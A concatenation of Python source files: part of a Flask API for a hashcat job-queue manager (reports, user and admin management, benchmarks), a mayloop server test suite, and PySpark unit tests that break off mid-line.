job_id=None): """ Method to get report file Returns ------ report: file HTML report file generated by Pypal """ try: marsh_schema = parse_json_schema().load(request.args) args = marsh_schema except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 if 'job_id' not in args: logger.debug('Reports queue requested') failed = rq.registry.FailedJobRegistry(queue=self.report_q) comp = rq.registry.FinishedJobRegistry(queue=self.report_q) started = rq.registry.StartedJobRegistry(queue=self.report_q) reports_dict = {} reports_dict.update({j: 'Generated' for j in comp.get_job_ids()}) reports_dict.update({j: 'Failed' for j in failed.get_job_ids()}) reports_dict.update({j: 'Running' for j in started.get_job_ids()}) return reports_dict, 200 else: job_id = str(args['job_id'].hex) # Check for existing session info logger.debug('User requesting report') if job_id: if job_id.isalnum(): check_job = check_jobid(job_id) if not check_job: return abort(401) if self.adder.session_check(self.log_dir, job_id): logger.debug('Valid session found') report_path = valid.val_filepath(path_string=self.report_dir, file_string='{}.json'.format(job_id)) try: with report_path.open('r') as rep: return json.loads(rep.read()), 200 except IOError as err: logger.debug('Error reading report: {}'.format(err)) return {'msg': 'No report generated for' ' this job'}, 500 else: return jsonify(ERR_INVAL_JID), 404 @login_required def post(self): """ Method to trigger report generation """ logger.debug('User requesting report') try: marsh_schema = parse_json_schema().load(request.json) args = marsh_schema except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 try: job_id = args['job_id'].hex except KeyError as err: logger.debug('No job ID provided') job_id = None except AttributeError as err: logger.debug('No job ID provided') job_id = None except TypeError as err: logger.debug('No job ID provided') job_id = None # Check for existing session info if job_id: self.adder = Adder() if job_id.isalnum(): check_job = check_jobid(job_id) if not check_job: return {'msg': 'Not Authorized'}, 401 if self.adder.session_check(self.log_dir, job_id): logger.debug('Valid session found') cracked_path = str(valid.val_filepath(path_string=self.log_dir, file_string='{}.cracked'.format(job_id))) report_path = str(valid.val_filepath(path_string=self.report_dir, file_string='{}.json'.format(job_id))) job = self.q.fetch_job(job_id) min_report = CRACK_CONF['misc']['min_report'] if job.meta['HC State']['Cracked Hashes'] < int(min_report): return {'msg': 'Cracked password list too ' 'small for meaningful ' 'analysis'}, 500 try: logger.debug('Generating report: {}' .format(cracked_path)) rep = self.report_q.enqueue(reporter, cracked_path, report_path, job_timeout=10080, result_ttl=604800, job_id='{}_report'.format(job_id)) if rep: return {'msg': 'Successfully queued ' 'report generation'}, 202 else: return {'msg': 'Error no report data ' 'returned'}, 500 except IOError: logger.debug('No cracked passwords found for this job') return {'msg': 'No report available for Job ID'}, 404 else: return jsonify(ERR_INVAL_JID), 404 class Profile(MethodView): """Flask User/profile management""" @login_required def get(self): """ View user profile """ result = {} try: result['user'] = current_user.username result['admin'] = current_user.is_admin result['email'] = current_user.email except AttributeError: abort(404) return jsonify(result), 200 @login_required def post(self): """ Update current user profile Arguments --------- password: string Current Password new_password: string New Password confirm_password: string New Password email: string Email address Returns ------- result: JSON message, HTTP code """ try: marsh_schema = parse_json_schema().load(request.json) args = marsh_schema except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 logger.debug('Updating user details') user = User.query.filter_by(id=current_user.id).first() ret = [] if isinstance(user, User) and 'password' in args: if args['password']: if 'new_password' in args and 'confirm_password' in args: if args['confirm_password'] and args['new_password']: if args['new_password'] != args['confirm_password']: return {'msg': 'Passwords do not match'}, 400 if bcrypt.check_password_hash(user.password, args['password']): pass_hash = bcrypt.generate_password_hash(args['new_password']) user.password = pass_hash.decode('utf-8') logger.debug('Updating password') ret.append({'msg': 'Password updated'}) crackq.app.session_interface.regenerate(session) else: return {'msg': 'Invalid Password'}, 401 if 'email' in args: if args['email'] and email_check(args['email']): if bcrypt.check_password_hash(user.password, args['password']): user.email = args['email'] logger.debug('Updating email') ret.append({'msg': 'Email updated'}) else: return {'msg': 'Invalid Password'}, 401 #else: # return {'msg': 'Invalid Email'}, 500 if ret: db.session.commit() return jsonify(ret), 200 return {'msg': 'Invalid Request'}, 500 class Admin(MethodView): """Flask Admin and user management""" @admin_required @login_required def get(self, user_id): """ View list of users or details of a single user Arguments --------- user_id: uuid/None User's ID to view details (if None show all) """ if user_id: result = {} try: user = User.query.filter_by(id=user_id).first() result['user_id'] = str(user.id) result['user'] = user.username result['admin'] = user.is_admin result['email'] = user.email except AttributeError: abort(404) else: result = [] users = User.query.all() for user in users: entry = {} entry['user_id'] = str(user.id) entry['user'] = user.username entry['admin'] = user.is_admin entry['email'] = user.email result.append(entry) return jsonify(result), 200 @admin_required @login_required def post(self): """ Creates a new user Arguments --------- user: string Username to create password: string Password email: string Email address Returns ------- result: tuple message, HTTP code """ try: marsh_schema = parse_json_schema().load(request.json) args = marsh_schema except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 args_needed = ['password', 'confirm_password', 'user'] if all(arg in args for arg in args_needed): if args['password'] != args['confirm_password']: return {'msg': 'Passwords do not match'}, 400 logger.debug('Creating User: {}'.format(args['user'])) pass_hash = bcrypt.generate_password_hash(args['password']).decode('utf-8') email = args['email'] if args['email'] else None create_user(username=args['user'], password=pass_hash, email=email) return {'msg': 'User created'}, 200 return {'msg': 'Error'}, 500 @admin_required @login_required def delete(self, user_id): """ Deletes a user account Arguments --------- user: string Username to make admin Returns ------- result: boolean Function success or failure """ if del_user(user_id): return {'msg': 'User deleted'}, 200 abort(404) @admin_required @login_required def put(self, user_id): """ Toggle admin privs for selected user Arguments --------- user_id: 1 User ID to make admin Returns ------- result: boolean Function success or failure """ user = User.query.filter_by(id=user_id).first() if isinstance(user, User): user.is_admin = not user.is_admin db.session.commit() return 'OK', 200 return 404 @admin_required @login_required def patch(self, user_id): """ Update selected user profile Arguments --------- new_password: string New Password confirm_password: string New Password email: string Email address Returns ------- result: JSON message, HTTP code """ try: marsh_schema = parse_json_schema().load(request.json) args = marsh_schema except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 logger.debug('Updating user details') user = User.query.filter_by(id=user_id).first() if isinstance(user, User): ret = [] if 'email' in args: if email_check(args['email']): logger.debug('Adding email address: {}'.format(args['email'])) user.email = args['email'] ret.append({'msg': 'Email updated'}) if 'new_password' in args and 'confirm_password' in args: if args['confirm_password'] and args['new_password']: if args['new_password'] != args['confirm_password']: return {'msg': 'Passwords do not match'}, 400 pass_hash = bcrypt.generate_password_hash(args['new_password']).decode('utf-8') user.password = pass_hash ret.append({'msg': 'Password updated'}) if ret: db.session.commit() ###***logout any sessions belonging user here return jsonify(ret), 200 return {'msg': 'Nothing to update'}, 200 return {'msg': 'Error'}, 500 class Benchmark(MethodView): """Run and display Hashcat Benchmarks""" def __init__(self): self.log_dir = CRACK_CONF['files']['log_dir'] self.bench_file = valid.val_filepath(path_string=self.log_dir, file_string='sys_benchmark.json') self.crack_q = crackqueue.Queuer() self.q = self.crack_q.q_connect() @login_required def get(self): """ View benchmark data """ result = {} try: with open(self.bench_file, 'rb') as bench_fh: result = json.loads(bench_fh.read()) except IOError as err: logger.error('Unable to open benchmark file: {}'.format(err)) abort(404) except Exception as err: logger.error('Benchmark read erorr: {}'.format(err)) return jsonify(result), 200 @login_required def post(self, benchmark_all=False): """ Run benchmark Arguments --------- benchmark_all: boolean Run full benchmark (--benchmark-all) Returns ------- result: JSON Message, HTTP code """ try: marsh_schema = parse_json_schema().load(request.json) args = marsh_schema except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 logger.debug('Queuing benchmark job') job_id = uuid.uuid4().hex add_jobid(job_id) q = self.crack_q.q_connect() hc_args = {} if 'benchmark_all' in args: hc_args['benchmark_all'] = args['benchmark_all'] hc_args['benchmark'] = True hc_args['name'] = 'Benchmark' hc_args['session'] = job_id try: q_args = { 'job_id': job_id, 'kwargs': hc_args, } self.crack_q.q_add(q, q_args) logger.debug('API Job {} added to queue'.format(job_id)) logger.debug('Job Details: {}'.format(q_args)) job = self.q.fetch_job(job_id) job.meta['email_count'] = 0 job.meta['notify'] = True if current_user.email: if email_check(current_user.email): job.meta['email'] = str(current_user.email) job.meta['last_seen'] = str(current_user.last_seen) elif email_check(current_user.username): job.meta['email'] = current_user.username job.meta['last_seen'] = str(current_user.last_seen) job.meta['CrackQ State'] = 'Run/Restored' job.meta['Speed Array'] = [] job.save_meta() return job_id, 202 except Exception as err: logger.error('Error running benchmark: {}'.format(err)) return {'msg': 'Invalid Request'}, 500
test_mainloop.py
from unittest import TestCase, main as ut_main, skip import logging from threading import Thread from multiprocessing import Process from time import sleep from mutils.system import is_py3 from mayloop.mainloop import MainLoop from mayloop.config import Config from mayloop.imported.twisted.internet_protocol import Factory from .mock_protocols import ReturnFixedMessage from .mock_client import Client if is_py3(): from queue import Queue else: from Queue import Queue class TestMainLoop(TestCase): server_process = None port = 40002 multiple_client_counts = [10, 100] exp_response = 'test response' server_logfile = 'server.log' @classmethod def setUpClass(cls): ReturnFixedMessage.message = cls.exp_response @classmethod def tearDownClass(cls): if cls.server_process is not None: print('stopping server..') cls.server_process.terminate() @classmethod def start_server_loop(cls, port): config = Config() config.add_service('', port, Factory.forProtocol(ReturnFixedMessage)) config.start_logger(target=cls.server_logfile, level=logging.DEBUG) server = MainLoop(config) server.start() def start_server(test_func): def new_func(self): if self.server_process is None: print('starting server..') TestMainLoop.server_process = Process(target=TestMainLoop.start_server_loop, args=(self.port,)) TestMainLoop.server_process.start() sleep(1) test_func(self) return new_func @start_server def test_single_client(self): client = Client('', self.port) client.connect() client.close() self.assertEquals(client.response, self.exp_response) @start_server def test_multiple_clients_serial(self): for i in self.multiple_client_counts: for j in range(i): client = Client('', self.port) client.connect() client.close() self.assertEquals(client.response, self.exp_response) @start_server def test_multiple_clients_parallel(self): def client_thread(port, client_id, results): client = Client('', port) client.connect() client.close() results.put((client_id, client.response)) for i in self.multiple_client_counts: threads = [] results = Queue() for j in range(i): t = Thread(target=client_thread, args=(self.port, j, results)) t.start() threads.append(t) if (j+1)%10 == 0: sleep(0.01) for j in range(i): threads[j].join() client_id, response = results.get() self.assertEquals(response, self.exp_response, msg='client %d failed'%client_id) if __name__ == '__main__': ut_main()
tests.py
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """ Unit tests for PySpark; additional tests are implemented as doctests in individual modules. """ from array import array from glob import glob import os import re import shutil import subprocess import sys import tempfile import time import zipfile import random import threading import hashlib from py4j.protocol import Py4JJavaError if sys.version_info[:2] <= (2, 6): try: import unittest2 as unittest except ImportError: sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier') sys.exit(1) else: import unittest if sys.version_info[0] >= 3: xrange = range basestring = str if sys.version >= "3": from io import StringIO else: from StringIO import StringIO from pyspark.conf import SparkConf from pyspark.context import SparkContext from pyspark.rdd import RDD from pyspark.files import SparkFiles from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \ CloudPickleSerializer, CompressedSerializer, UTF8Deserializer, NoOpSerializer, \ PairDeserializer, CartesianDeserializer, AutoBatchedSerializer, AutoSerializer, \ FlattenedValuesSerializer from pyspark.shuffle import Aggregator, InMemoryMerger, ExternalMerger, ExternalSorter from pyspark import shuffle from pyspark.profiler import BasicProfiler _have_scipy = False _have_numpy = False try: import scipy.sparse _have_scipy = True except: # No SciPy, but that's okay, we'll skip those tests pass try: import numpy as np _have_numpy = True except: # No NumPy, but that's okay, we'll skip those tests pass SPARK_HOME = os.environ["SPARK_HOME"] class MergerTests(unittest.TestCase): def setUp(self): self.N = 1 << 12 self.l = [i for i in xrange(self.N)] self.data = list(zip(self.l, self.l)) self.agg = Aggregator(lambda x: [x], lambda x, y: x.append(y) or x, lambda x, y: x.extend(y) or x) def test_in_memory(self): m = InMemoryMerger(self.agg) m.mergeValues(self.data) self.assertEqual(sum(sum(v) for k, v in m.items()), sum(xrange(self.N))) m = InMemoryMerger(self.agg) m.mergeCombiners(map(lambda x_y: (x_y[0], [x_y[1]]), self.data)) self.assertEqual(sum(sum(v) for k, v in m.items()), sum(xrange(self.N))) def test_small_dataset(self): m = ExternalMerger(self.agg, 1000) m.mergeValues(self.data) self.assertEqual(m.spills, 0) self.assertEqual(sum(sum(v) for k, v in m.items()), sum(xrange(self.N))) m = ExternalMerger(self.agg, 1000) m.mergeCombiners(map(lambda x_y1: (x_y1[0], [x_y1[1]]), self.data)) self.assertEqual(m.spills, 0) self.assertEqual(sum(sum(v) for k, v in m.items()), sum(xrange(self.N))) def test_medium_dataset(self): m = ExternalMerger(self.agg, 20) m.mergeValues(self.data) self.assertTrue(m.spills >= 1) self.assertEqual(sum(sum(v) for k, v in m.items()), sum(xrange(self.N))) m = ExternalMerger(self.agg, 10) m.mergeCombiners(map(lambda x_y2: (x_y2[0], [x_y2[1]]), self.data * 3)) self.assertTrue(m.spills >= 1) self.assertEqual(sum(sum(v) for k, v in m.items()), sum(xrange(self.N)) * 3) def test_huge_dataset(self): m = ExternalMerger(self.agg, 5, partitions=3) m.mergeCombiners(map(lambda k_v: (k_v[0], [str(k_v[1])]), self.data * 10)) self.assertTrue(m.spills >= 1) self.assertEqual(sum(len(v) for k, v in m.items()), self.N * 10) m._cleanup() def test_group_by_key(self): def gen_data(N, step): for i in range(1, N + 1, step): for j in range(i): yield (i, [j]) def gen_gs(N, step=1): return shuffle.GroupByKey(gen_data(N, step)) self.assertEqual(1, len(list(gen_gs(1)))) self.assertEqual(2, len(list(gen_gs(2)))) self.assertEqual(100, len(list(gen_gs(100)))) self.assertEqual(list(range(1, 101)), [k for k, _ in gen_gs(100)]) self.assertTrue(all(list(range(k)) == list(vs) for k, vs in gen_gs(100))) for k, vs in gen_gs(50002, 10000): self.assertEqual(k, len(vs)) self.assertEqual(list(range(k)), list(vs)) ser = PickleSerializer() l = ser.loads(ser.dumps(list(gen_gs(50002, 30000)))) for k, vs in l: self.assertEqual(k, len(vs)) self.assertEqual(list(range(k)), list(vs)) class SorterTests(unittest.TestCase): def test_in_memory_sort(self): l = list(range(1024)) random.shuffle(l) sorter = ExternalSorter(1024) self.assertEqual(sorted(l), list(sorter.sorted(l))) self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True))) self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x))) self.assertEqual(sorted(l, key=lambda x: -x, reverse=True), list(sorter.sorted(l, key=lambda x: -x, reverse=True))) def test_external_sort(self): l = list(range(1024)) random.shuffle(l) sorter = ExternalSorter(1) self.assertEqual(sorted(l), list(sorter.sorted(l))) self.assertGreater(shuffle.DiskBytesSpilled, 0) last = shuffle.DiskBytesSpilled self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True))) self.assertGreater(shuffle.DiskBytesSpilled, last) last = shuffle.DiskBytesSpilled self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x))) self.assertGreater(shuffle.DiskBytesSpilled, last) last = shuffle.DiskBytesSpilled self.assertEqual(sorted(l, key=lambda x: -x, reverse=True), list(sorter.sorted(l, key=lambda x: -x, reverse=True))) self.assertGreater(shuffle.DiskBytesSpilled, last) def test_external_sort_in_rdd(self): conf = SparkConf().set("spark.python.worker.memory", "1m") sc = SparkContext(conf=conf) l = list(range(10240)) random.shuffle(l) rdd = sc.parallelize(l, 4) self.assertEqual(sorted(l), rdd.sortBy(lambda x: x).collect()) sc.stop() class SerializationTestCase(unittest.TestCase): def test_namedtuple(self): from collections import namedtuple from pickle import dumps, loads P = namedtuple("P", "x y") p1 = P(1, 3) p2 = loads(dumps(p1, 2)) self.assertEqual(p1, p2) def test_itemgetter(self): from operator import itemgetter ser = CloudPickleSerializer() d = range(10) getter = itemgetter(1) getter2 = ser.loads(ser.dumps(getter)) self.assertEqual(getter(d), getter2(d)) getter = itemgetter(0, 3) getter2 = ser.loads(ser.dumps(getter)) self.assertEqual(getter(d), getter2(d)) def test_attrgetter(self): from operator import attrgetter ser = CloudPickleSerializer() class C(object): def __getattr__(self, item): return item d = C() getter = attrgetter("a") getter2 = ser.loads(ser.dumps(getter)) self.assertEqual(getter(d), getter2(d)) getter = attrgetter("a", "b") getter2 = ser.loads(ser.dumps(getter)) self.assertEqual(getter(d), getter2(d)) d.e = C() getter = attrgetter("e.a") getter2 = ser.loads(ser.dumps(getter)) self.assertEqual(getter(d), getter2(d)) getter = attrgetter("e.a", "e.b") getter2 = ser.loads(ser.dumps(getter)) self.assertEqual(getter(d), getter2(d)) # Regression test for SPARK-3415 def test_pickling_file_handles(self): ser = CloudPickleSerializer() out1 = sys.stderr out2 = ser.loads(ser.dumps(out1)) self.assertEqual(out1, out2) def test_func_globals(self): class Unpicklable(object): def __reduce__(self): raise Exception("not picklable") global exit exit = Unpicklable() ser = CloudPickleSerializer() self.assertRaises(Exception, lambda: ser.dumps(exit)) def foo(): sys.exit(0) self.assertTrue("exit" in foo.__code__.co_names) ser.dumps(foo) def test_compressed_serializer(self): ser = CompressedSerializer(PickleSerializer()) try: from StringIO import StringIO except ImportError: from io import BytesIO as StringIO io = StringIO() ser.dump_stream(["abc", u"123", range(5)], io) io.seek(0) self.assertEqual(["abc", u"123", range(5)], list(ser.load_stream(io))) ser.dump_stream(range(1000), io) io.seek(0) self.assertEqual(["abc", u"123", range(5)] + list(range(1000)), list(ser.load_stream(io))) io.close() def test_hash_serializer(self): hash(NoOpSerializer()) hash(UTF8Deserializer()) hash(PickleSerializer()) hash(MarshalSerializer()) hash(AutoSerializer()) hash(BatchedSerializer(PickleSerializer())) hash(AutoBatchedSerializer(MarshalSerializer())) hash(PairDeserializer(NoOpSerializer(), UTF8Deserializer())) hash(CartesianDeserializer(NoOpSerializer(), UTF8Deserializer())) hash(CompressedSerializer(PickleSerializer())) hash(FlattenedValuesSerializer(PickleSerializer())) class QuietTest(object): def __init__(self, sc): self.log4j = sc._jvm.org.apache.log4j def __enter__(self): self.old_level = self.log4j.LogManager.getRootLogger().getLevel() self.log4j.LogManager.getRootLogger().setLevel(self.log4j.Level.FATAL) def __exit__(self, exc_type, exc_val, exc_tb): self.log4j.LogManager.getRootLogger().setLevel(self.old_level) class PySparkTestCase(unittest.TestCase): def setUp(self): self._old_sys_path = list(sys.path) class_name = self.__class__.__name__ self.sc = SparkContext('local[4]', class_name) def tearDown(self): self.sc.stop() sys.path = self._old_sys_path class ReusedPySparkTestCase(unittest.TestCase): @classmethod def setUpClass(cls): cls.sc = SparkContext('local[4]', cls.__name__) @classmethod def tearDownClass(cls): cls.sc.stop() class CheckpointTests(ReusedPySparkTestCase): def setUp(self): self.checkpointDir = tempfile.NamedTemporaryFile(delete=False) os.unlink(self.checkpointDir.name) self.sc.setCheckpointDir(self.checkpointDir.name) def tearDown(self): shutil.rmtree(self.checkpointDir.name) def test_basic_checkpointing(self): parCollection = self.sc.parallelize([1, 2, 3, 4]) flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1)) self.assertFalse(flatMappedRDD.isCheckpointed()) self.assertTrue(flatMappedRDD.getCheckpointFile() is None) flatMappedRDD.checkpoint() result = flatMappedRDD.collect() time.sleep(1) # 1 second self.assertTrue(flatMappedRDD.isCheckpointed()) self.assertEqual(flatMappedRDD.collect(), result) self.assertEqual("file:" + self.checkpointDir.name, os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile()))) def test_checkpoint_and_restore(self): parCollection = self.sc.parallelize([1, 2, 3, 4]) flatMappedRDD = parCollection.flatMap(lambda x: [x]) self.assertFalse(flatMappedRDD.isCheckpointed()) self.assertTrue(flatMappedRDD.getCheckpointFile() is None) flatMappedRDD.checkpoint() flatMappedRDD.count() # forces a checkpoint to be computed time.sleep(1) # 1 second self.assertTrue(flatMappedRDD.getCheckpointFile() is not None) recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(), flatMappedRDD._jrdd_deserializer) self.assertEqual([1, 2, 3, 4], recovered.collect()) class AddFileTests(PySparkTestCase): def test_add_py_file(self): # To ensure that we're actually testing addPyFile's effects, check that # this job fails due to `userlibrary` not being on the Python path: # disable logging in log4j temporarily def func(x): from userlibrary import UserClass return UserClass().hello() with QuietTest(self.sc): self.assertRaises(Exception, self.sc.parallelize(range(2)).map(func).first) # Add the file, so the job should now succeed: path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py") self.sc.addPyFile(path) res = self.sc.parallelize(range(2)).map(func).first() self.assertEqual("Hello World!", res) def test_add_file_locally(self): path = os.path.join(SPARK_HOME, "python/test_support/hello.txt") self.sc.addFile(path) download_path = SparkFiles.get("hello.txt") self.assertNotEqual(path, download_path) with open(download_path) as test_file: self.assertEqual("Hello World!\n", test_file.readline()) def test_add_py_file_locally(self): # To ensure that we're actually testing addPyFile's effects, check that # this fails due to `userlibrary` not being on the Python path: def func(): from userlibrary import UserClass self.assertRaises(ImportError, func) path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py") self.sc.addPyFile(path) from userlibrary import UserClass self.assertEqual("Hello World!", UserClass().hello()) def test_add_egg_file_locally(self): # To ensure that we're actually testing addPyFile's effects, check that # this fails due to `userlibrary` not being on the Python path: def func(): from userlib import UserClass self.assertRaises(ImportError, func) path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1.zip") self.sc.addPyFile(path) from userlib import UserClass self.assertEqual("Hello World from inside a package!", UserClass().hello()) def test_overwrite_system_module(self): self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py")) import SimpleHTTPServer self.assertEqual("My Server", SimpleHTTPServer.__name__) def func(x): import SimpleHTTPServer return SimpleHTTPServer.__name__ self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect()) class RDDTests(ReusedPySparkTestCase): def test_range(self): self.assertEqual(self.sc.range(1, 1).count(), 0) self.assertEqual(self.sc.range(1, 0, -1).count(), 1) self.assertEqual(self.sc.range(0, 1 << 40, 1 << 39).count(), 2) def test_id(self): rdd = self.sc.parallelize(range(10)) id = rdd.id() self.assertEqual(id, rdd.id()) rdd2 = rdd.map(str).filter(bool) id2 = rdd2.id() self.assertEqual(id + 1, id2) self.assertEqual(id2, rdd2.id()) def test_save_as_textfile_with_unicode(self): # Regression test for SPARK-970 x = u"\u00A1Hola, mundo!" data = self.sc.parallelize([x]) tempFile = tempfile.NamedTemporaryFile(delete=True) tempFile.close() data.saveAsTextFile(tempFile.name) raw_contents = b''.join(open(p, 'rb').read() for p in glob(tempFile.name + "/part-0000*")) self.assertEqual(x, raw_contents.strip().decode("utf-8")) def test_save_as_textfile_with_utf8(self): x = u"\u00A1Hola, mundo!" data = self.sc.parallelize([x.encode("utf-8")]) tempFile = tempfile.NamedTemporaryFile(delete=True) tempFile.close() data.saveAsTextFile(tempFile.name) raw_contents = b''.join(open(p, 'rb').read() for p in glob(tempFile.name + "/part-0000*")) self.assertEqual(x, raw_contents.strip().decode('utf8')) def test_transforming_cartesian_result(self): # Regression test for SPARK-1034 rdd1 = self.sc.parallelize([1, 2]) rdd2 = self.sc.parallelize([3, 4]) cart = rdd1.cartesian(rdd2) result = cart.map(lambda x_y3: x_y3[0] + x_y3[1]).collect() def test_transforming_pickle_file(self): # Regression test for SPARK-2601 data = self.sc.parallelize([u"Hello", u"World!"]) tempFile = tempfile.NamedTemporaryFile(delete=True) tempFile.close() data.saveAsPickleFile(tempFile.name) pickled_file = self.sc.pickleFile(tempFile.name) pickled_file.map(lambda x: x).collect() def test_cartesian_on_textfile(self): # Regression test for path = os.path.join(SPARK_HOME, "python/test_support/hello.txt") a = self.sc.textFile(path) result = a.cartesian(a).collect() (x, y) = result[0] self.assertEqual(u"Hello World!", x.strip()) self.assertEqual(u"Hello World!", y.strip()) def test_deleting_input_files(self): # Regression test for SPARK-1025 tempFile = tempfile.NamedTemporaryFile(delete=False) tempFile.write(b"Hello World!") tempFile.close() data = self.sc.textFile(tempFile.name) filtered_data = data.filter(lambda x: True) self.assertEqual(1, filtered_data.count()) os.unlink(tempFile.name) with QuietTest(self.sc): self.assertRaises(Exception, lambda: filtered_data.count()) def test_sampling_default_seed(self): # Test for SPARK-3995 (default seed setting) data = self.sc.parallelize(range(1000), 1) subset = data.takeSample(False, 10) self.assertEqual(len(subset), 10) def test_aggregate_by_key(self): data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2) def seqOp(x, y): x.add(y) return x def combOp(x, y): x |= y return x sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect()) self.assertEqual(3, len(sets)) self.assertEqual(set([1]), sets[1]) self.assertEqual(set([2]), sets[3]) self.assertEqual(set([1, 3]), sets[5]) def test_itemgetter(self): rdd = self.sc.parallelize([range(10)]) from operator import itemgetter self.assertEqual([1], rdd.map(itemgetter(1)).collect()) self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect()) def test_namedtuple_in_rdd(self): from collections import namedtuple Person = namedtuple("Person", "id firstName lastName") jon = Person(1, "Jon", "Doe") jane = Person(2, "Jane", "Doe") theDoes = self.sc.parallelize([jon, jane]) self.assertEqual([jon, jane], theDoes.collect()) def test_large_broadcast(self): N = 10000 data = [[float(i) for i in range(300)] for i in range(N)] bdata = self.sc.broadcast(data) # 27MB m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum() self.assertEqual(N, m) def test_multiple_broadcasts(self): N = 1 << 21 b1 = self.sc.broadcast(set(range(N))) # multiple blocks in JVM r = list(range(1 << 15)) random.shuffle(r) s = str(r).encode() checksum = hashlib.md5(s).hexdigest() b2 = self.sc.broadcast(s) r = list(set(self.sc.parallelize(range(10), 10).map( lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect())) self.assertEqual(1, len(r)) size, csum = r[0] self.assertEqual(N, size) self.assertEqual(checksum, csum) random.shuffle(r) s = str(r).encode() checksum = hashlib.md5(s).hexdigest() b2 = self.sc.broadcast(s) r = list(set(self.sc.parallelize(range(10), 10).map( lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect())) self.assertEqual(1, len(r)) size, csum = r[0] self.assertEqual(N, size) self.assertEqual(checksum, csum) def test_large_closure(self): N = 200000 data = [float(i) for i in xrange(N)] rdd = self.sc.parallelize(range(1), 1).map(lambda x: len(data)) self.assertEqual(N, rdd.first()) # regression test for SPARK-6886 self.assertEqual(1, rdd.map(lambda x: (x, 1)).groupByKey().count()) def test_zip_with_different_serializers(self): a = self.sc.parallelize(range(5)) b = self.sc.parallelize(range(100, 105)) self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)]) a = a._reserialize(BatchedSerializer(PickleSerializer(), 2)) b = b._reserialize(MarshalSerializer()) self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)]) # regression test for SPARK-4841 path = os.path.join(SPARK_HOME, "python/test_support/hello.txt") t = self.sc.textFile(path) cnt = t.count() self.assertEqual(cnt, t.zip(t).count()) rdd = t.map(str) self.assertEqual(cnt, t.zip(rdd).count()) # regression test for bug in _reserializer() self.assertEqual(cnt, t.zip(rdd).count()) def test_zip_with_different_object_sizes(self): # regress test for SPARK-5973 a = self.sc.parallelize(range(10000)).map(lambda i: '*' * i) b = self.sc.parallelize(range(10000, 20000)).map(lambda i: '*' * i) self.assertEqual(10000, a.zip(b).count()) def test_zip_with_different_number_of_items(self): a = self.sc.parallelize(range(5), 2) # different number of partitions b = self.sc.parallelize(range(100, 106), 3) self.assertRaises(ValueError, lambda: a.zip(b)) with QuietTest(self.sc): # different number of batched items in JVM b = self.sc.parallelize(range(100, 104), 2) self.assertRaises(Exception, lambda: a.zip(b).count()) # different number of items in one pair b = self.sc.parallelize(range(100, 106), 2) self.assertRaises(Exception, lambda: a.zip(b).count()) # same total number of items, but different distributions a = self.sc.parallelize([2, 3], 2).flatMap(range) b = self.sc.parallelize([3, 2], 2).flatMap(range) self.assertEqual(a.count(), b.count()) self.assertRaises(Exception, lambda: a.zip(b).count()) def test_count_approx_distinct(self): rdd = self.sc.parallelize(range(1000)) self.assertTrue(950 < rdd.countApproxDistinct(0.03) < 1050) self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.03) < 1050) self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.03) < 1050) self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.03) < 1050) rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7) self.assertTrue(18 < rdd.countApproxDistinct() < 22) self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22) self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22) self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22) self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001)) def test_histogram(self): # empty rdd = self.sc.parallelize([]) self.assertEqual([0], rdd.histogram([0, 10])[1]) self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1]) self.assertRaises(ValueError, lambda: rdd.histogram(1)) # out of range rdd = self.sc.parallelize([10.01, -0.01]) self.assertEqual([0], rdd.histogram([0, 10])[1]) self.assertEqual([0, 0], rdd.histogram((0, 4, 10))[1]) # in range with one bucket rdd = self.sc.parallelize(range(1, 5)) self.assertEqual([4], rdd.histogram([0, 10])[1]) self.assertEqual([3, 1], rdd.histogram([0, 4, 10])[1]) # in range with one bucket exact match self.assertEqual([4], rdd.histogram([1, 4])[1]) # out of 